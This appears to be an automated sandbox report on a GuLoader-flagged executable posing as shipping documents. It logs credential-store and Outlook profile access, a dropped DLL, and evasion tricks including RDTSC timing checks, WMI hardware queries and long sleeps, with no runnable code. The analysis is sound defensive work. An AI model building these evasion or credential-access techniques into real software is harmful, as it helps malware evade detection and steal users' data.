Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

File written: C:\Users\user\AppData\Local\Temp\Settings.ini

Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.3041044972.0000000006125000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 0_2_10002DB0 push eax; ret	0_2_10002DDE
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_37FE3FD0 push 2438C7DAh; retf	4_2_37FE3FD5
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_38CA057F push dword ptr [edi]; ret	4_2_38CA0590

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

File created: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	API/Special instruction interceptor: Address: 675E863
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	API/Special instruction interceptor: Address: 31DE863

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	RDTSC instruction interceptor: First address: 6708F70 second address: 6708F70 instructions: 0x00000000 rdtsc 0x00000002 test al, al 0x00000004 cmp ax, bx 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F6830F0C228h 0x0000000b cmp esi, 20C649BBh 0x00000011 test cl, 00000060h 0x00000014 inc ebp 0x00000015 cmp eax, ecx 0x00000017 inc ebx 0x00000018 cmp dl, al 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	RDTSC instruction interceptor: First address: 3188F70 second address: 3188F70 instructions: 0x00000000 rdtsc 0x00000002 test al, al 0x00000004 cmp ax, bx 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F6830E09938h 0x0000000b cmp esi, 20C649BBh 0x00000011 test cl, 00000060h 0x00000014 inc ebp 0x00000015 cmp eax, ecx 0x00000017 inc ebx 0x00000018 cmp dl, al 0x0000001a rdtsc

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Memory allocated: 35710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Memory allocated: 37710000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598418	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598311	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597965	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597808	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597589	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595498	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 594484	Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Window / User API: threadDelayed 2180			Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Window / User API: threadDelayed 7666			Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

API coverage: 1.5 %

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -35971150943733603s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 428	Thread sleep count: 2180 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 428	Thread sleep count: 7666 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -598641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -598418s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -598311s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -597965s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -597808s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -597589s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -596266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -595719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -595498s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -595391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -595266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -595141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852	Thread sleep time: -594484s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_0040276E FindFirstFileW,	4_2_0040276E
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405770
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_0040622B FindFirstFileW,FindClose,	4_2_0040622B

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598418	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598311	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597965	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597808	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597589	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596266	Jump to behavior
